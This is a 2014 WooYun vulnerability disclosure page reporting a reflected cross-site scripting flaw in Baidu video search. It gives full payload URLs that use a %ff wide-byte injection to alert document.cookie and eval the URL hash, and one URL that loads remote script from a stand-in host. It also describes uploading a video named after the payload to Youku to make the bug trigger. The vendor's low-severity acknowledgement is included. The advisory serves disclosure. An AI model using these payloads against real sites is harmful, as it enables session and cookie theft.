当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:
wooyun-2014-068603
漏洞标题:
百度搜索反射型跨站第二弹
相关厂商:
百度
漏洞作者:
vanilla
提交时间:
2014-07-15 15:49
修复时间:
2014-08-29 15:50
公开时间:
2014-08-29 15:50
漏洞类型:
xss跨站脚本攻击
危害等级:
自评Rank:
8
漏洞状态:
厂商已经确认
漏洞来源:
http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签:
分享漏洞:
4人收藏 收藏
分享漏洞:
>

漏洞详情

披露状态:

2014-07-15: 细节已通知厂商并且等待厂商处理中
2014-07-15: 厂商已经确认,细节仅向厂商公开
2014-07-25: 细节向核心白帽子及相关领域专家公开
2014-08-04: 细节向普通白帽子公开
2014-08-14: 细节向实习白帽子公开
2014-08-29: 细节向公众公开

简要描述:

说好的续集,今天终于兑现了,实际上放在那儿好久了,一直忘了发。问题出在百度视频搜索。你将看到一个曲折的加载远程js的过程

详细说明:

在视频搜索 v.baidu.com
用普通的测试代码进行搜索没有发现任何问题,过滤很严格.
尝试宽字节:

http://v.baidu.com/#word=%bf",alert&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8


还是没有任何异常......
尝试多种姿势
没有异常
...........
当我测试到 %ff的时候奇迹出现了

http://v.baidu.com/#word=%ff"a&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&oq=&f=3&rsp=&ie=utf-8


发现多了一条网络访问,而且控制台报错了:

link1.jpg


而且可以alert

http://v.baidu.com/v?word=%ff%22,a:alert(document.cookie),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#pn=20&qq-pf-to=pcqq.temporaryc2c


link2.jpg


link3.jpg


但是仅仅弹个框框是完全不够的,我要加载js,于是我尝试

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#alert(1)//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite


并没有成功,因为百度没有收录b:eval(location.hash.slice(1))这个视频,因此没有搜索结果,也不会触发这个跨站
那我们要怎么做呢
没错,它没有我们就去上传一个,于是我去注册了个优酷账号,然后上传了一个名为
b:eval(location.hash.slice(1))的视频,接着我把链接提交给了百度,然后就是漫长的等待,也不知道过了多久,有一天我访问

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#alert(1)//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite


发现弹出了

link4.jpg


加载远程js什么的就简单了
由于IE浏览器filter的原因,IE浏览器下访问会直接卡死,暂时没有找到绕过的方法

link5.jpg


做个总结吧:
1、当你尝试宽字节的时候,除了%bf,%ef外,不要忘了%ff
2、环境不允许的时候,我们可以创造环境。

漏洞证明:

在chrome,360极速浏览器或者火狐浏览器下执行,弹框

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#alert(1)//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite


link4.jpg


加载远程js

http://v.baidu.com/v?word=%ff%22,b:eval(location.hash.slice(1)),//&ct=301989888&rn=20&pn=0&db=0&s=0&fbl=800&ie=gbk#with(document)body.appendChild(createElement('script')).src='xx.com'//&pn=0&old=&ty=0&nf=0&cl=0&du=0&pd=0&sc=17&order=0&from=selectsite

修复方案:

方法1、删除那个视频
方法2、修复宽字节的问题

版权声明:转载请注明来源 vanilla@乌云

>

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2014-07-15 16:22

厂商回复:

感谢对百度安全的支持。

最新状态:

暂无